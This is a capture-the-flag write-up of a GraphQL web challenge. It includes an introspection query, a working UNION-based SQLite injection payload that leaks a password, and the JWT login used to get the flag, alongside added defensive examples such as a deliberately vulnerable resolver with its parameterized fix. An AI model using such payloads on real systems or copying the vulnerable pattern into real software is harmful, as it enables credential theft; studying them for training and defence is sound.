Tags: sqlite web graphql 

Rating: 4.0

Once we started searching, we found a GraphQL endpoint at /graphql.
With the big introspection payload from PayloadsAllTheThings we can pull all the schema information out of it.

For convenience, we can use the "GraphQL Voyager" extension in Burp Suite.

Request (the "query" string of the JSON POST body, with the escaped line breaks expanded):

```
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}
```
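The request above is the standard introspection document: everything it learns comes through the "__schema" and "__type" meta-fields, which is also what a defender can watch for (or switch off in production). The following is an added example, not code from the writeup or the challenge, that flags introspection in a constructed set of request bodies. It blanks out string literals and comments first, so a query that merely passes the text "__schema" as an argument is not flagged, and it leaves "__typename" alone because ordinary clients select it.

```python
import json
import re

# GraphQL introspection reaches the schema through the meta-fields __schema
# and __type. Strings and comments are blanked out first so that a literal
# such as post(name: "__schema") is not mistaken for a field selection.
# __typename is deliberately not matched: ordinary clients select it and it
# reveals nothing about the schema.
_STRING_OR_COMMENT = re.compile(r'"""[\s\S]*?"""|"(?:\\.|[^"\\])*"|#[^\r\n]*')
_META_FIELD = re.compile(r'(?<![\w.])__(?:schema|type)\b')


def extract_query(body: str) -> str:
    """Pull the GraphQL document out of a request body.

    Accepts the usual {"query": ...} JSON object, a JSON list of batched
    operations, or a raw application/graphql body (returned unchanged).
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return body
    if isinstance(doc, dict):
        return doc.get("query") or ""
    if isinstance(doc, list):
        return "\n".join(op.get("query") or "" for op in doc if isinstance(op, dict))
    return ""


def is_introspection(body: str) -> bool:
    """True if the body selects __schema or __type as a field."""
    query = _STRING_OR_COMMENT.sub(" ", extract_query(body))
    return _META_FIELD.search(query) is not None


# Constructed sample requests (source address, body); not real challenge traffic.
SAMPLE_REQUESTS = [
    ("10.0.0.5", json.dumps({"query": "query IntrospectionQuery {\r\n __schema {\r\n types { name }\r\n }\r\n}",
                             "variables": None})),
    ("10.0.0.5", json.dumps({"query": 'query { __type(name: "Query") { fields { name } } }'})),
    ("10.0.0.9", json.dumps({"query": 'query UserQuery { post(name: "__schema") { content } }'})),
    ("10.0.0.9", json.dumps({"query": 'mutation { authenticateUser(username: "a", password: "b") { token } }'})),
    ("10.0.0.7", "{ __schema { queryType { name } } }"),  # raw application/graphql body
    ("10.0.0.7", json.dumps([{"query": "{ flag }"}, {"query": "{ __typename }"}])),  # batched
]


def flag_introspection(requests):
    """Return the source addresses whose request body is an introspection query."""
    return [src for src, body in requests if is_introspection(body)]


if __name__ == "__main__":
    for src in flag_introspection(SAMPLE_REQUESTS):
        print("introspection from", src)
```

Run over the constructed requests, only the two real introspection bodies from 10.0.0.5 and the raw-body one from 10.0.0.7 are flagged; the "__schema" string argument and the "__typename" selection pass.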

The response can be pasted into https://apis.guru/graphql-voyager/ to get an easy-to-view graph.
![](https://user-images.githubusercontent.com/83348650/133906491-7e76d659-ed62-4174-acb3-1953a4cfdb84.png)
In this graph we see that there is a "flag" query.
Let's try to send a request:
```
query {
  flag
}
```
But the response is:
```
"message":"error authenticating user: invalid token"
```

After spending a lot of time on Google looking for information about GraphQL, and sending a large number of requests, we found an SQLite injection in the post query:
```
query UserQuery{
  post (name:"' union select 1,2,3,password,5,6 from users --") {
    content
  }
}
```
Response:
```
"content":"n8bboB!3%vDwiASVgKhv"
```
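What makes this work is a resolver that splices the name argument into the SQL text, so the quote in the argument closes the literal and the rest becomes SQL. As an added example (not the challenge's code; the table layout and column names are assumptions, constrained only by the six-column UNION in the payload above), here is a vulnerable SQLite resolver next to a parameterized one, both run against the payload from the writeup:

```python
import sqlite3

# Constructed demo schema, not the challenge's real database. The payload
# "' union select 1,2,3,password,5,6 from users --" only tells us that the
# post query selects six columns and exposes the fourth one as `content`;
# the table and column names below are assumptions.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE posts (id INTEGER PRIMARY KEY, name TEXT, title TEXT,
                    content TEXT, author TEXT, created TEXT);
INSERT INTO users VALUES (1, 'congon4tor', 'n8bboB!3%vDwiASVgKhv');
INSERT INTO posts VALUES (1, 'hello', 'Hello', 'first post', 'congon4tor', '2021-09-18');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def resolve_post_vulnerable(conn, name):
    """Resolver as the writeup implies it was written: the argument is
    formatted into the SQL string, so a quote ends the literal and the
    remainder of the argument is executed as SQL."""
    sql = ("SELECT id, name, title, content, author, created FROM posts "
           f"WHERE name = '{name}'")
    row = conn.execute(sql).fetchone()
    return None if row is None else {"content": row[3]}


def resolve_post_fixed(conn, name):
    """Hardened resolver: the argument travels as a bound parameter, so the
    driver never interprets it as SQL and the same payload matches no post."""
    sql = ("SELECT id, name, title, content, author, created FROM posts "
           "WHERE name = ?")
    row = conn.execute(sql, (name,)).fetchone()
    return None if row is None else {"content": row[3]}


PAYLOAD = "' union select 1,2,3,password,5,6 from users --"


def demo():
    conn = make_db()
    return {
        "vulnerable": resolve_post_vulnerable(conn, PAYLOAD),  # leaks the password
        "fixed": resolve_post_fixed(conn, PAYLOAD),            # no such post
        "legit": resolve_post_fixed(conn, "hello"),            # normal lookup still works
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

The vulnerable resolver returns the password from the users table because the first SELECT matches nothing (name = '') and the UNION supplies the attacker's row; the trailing "--" comments out the closing quote. The parameterized resolver compares the whole payload as a literal post name and finds nothing.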
From the posts on the site we found the name of the author: congon4tor.

Now we have the credentials congon4tor:n8bboB!3%vDwiASVgKhv

We need to get a token with these credentials.

With the help of my teammate jelly7183, we sent the following request to list every field and its arguments:
```
query {
  __schema {
    types {
      name, fields {
        name, args {
          name, description, type {
            name, kind, ofType {
              name, kind
            }
          }
        }
      }
    }
  }
}
```
Response:
```
"name":"authenticateUser"
```

Now we need to send a mutation request to authenticateUser.

Request:
```
mutation {
  authenticateUser(username:"congon4tor", password:"n8bboB!3%vDwiASVgKhv"){token}
}
```
Response:
```
"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjQ5MjksImlhdCI6MTYzMTk5MjEyOSwiaXNzIjoiQ29uZ29uNHRvciJ9.ObmWd65tvTGUOIAIo1u4XmiScZE00tvA7Gu_Dtm1cpQ"
```
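The token is a JWT: its header and claims are base64url-encoded JSON, so they can be read without the signing secret. The following added example (not part of the writeup) decodes the token returned above and reports its algorithm, claims, signature size and lifetime; it deliberately does not verify the signature, which only the server's HS256 secret allows.

```python
import base64
import json


def _b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str) -> dict:
    """Decode header and claims WITHOUT checking the signature.

    This shows what the token asserts; whether to trust it is a separate
    question that needs the server's HMAC secret (HS256), which a client
    does not have.
    """
    header_b64, payload_b64, signature_b64 = token.split(".")
    return {
        "header": json.loads(_b64url_decode(header_b64)),
        "claims": json.loads(_b64url_decode(payload_b64)),
        # 32 bytes is what an HMAC-SHA256 tag should be
        "signature_bytes": len(_b64url_decode(signature_b64)),
    }


def token_lifetime(token: str) -> int:
    """Seconds between issue (iat) and expiry (exp)."""
    claims = inspect_jwt(token)["claims"]
    return claims["exp"] - claims["iat"]


def is_valid_at(token: str, now: int) -> bool:
    """Time-window check only: issued no later than `now` and not yet expired."""
    claims = inspect_jwt(token)["claims"]
    return claims["iat"] <= now < claims["exp"]


# The token returned by authenticateUser in the writeup above.
TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjQ5MjksImlhdCI6MTYzMTk5MjEyOSwiaXNzIjoiQ29uZ29uNHRvciJ9."
    "ObmWd65tvTGUOIAIo1u4XmiScZE00tvA7Gu_Dtm1cpQ"
)

if __name__ == "__main__":
    info = inspect_jwt(TOKEN)
    print("alg:", info["header"]["alg"], "signature bytes:", info["signature_bytes"])
    print("claims:", info["claims"])
    print("lifetime:", token_lifetime(TOKEN) // 3600, "hours")
```

Decoding shows an HS256 token for username congon4tor with issuer Congon4tor and a 48-hour window between iat and exp; the 32-byte signature matches the declared algorithm.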
Great, now we have a token; all that remains is to form a proper request to the "flag" query.
Add this header to the HTTP request:
```
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjE1NzIsImlhdCI6MTYzMTk4ODc3MiwiaXNzIjoiQ29uZ29uNHRvciJ9.Gqllh1rt_OHVcTWMfRREZy0pKPRxhlsvxQFw6Wu0rxE
```
and set the query to:
```
query {
  flag
}
```
and we get the flag in the response:
```
"flag":"flag{9d26b6e4a765ecd87fe03a1494c22236}"
```

Sadman_Abrar_Rafin, Sept. 19, 2021, 2:33 a.m.

very nice!!!!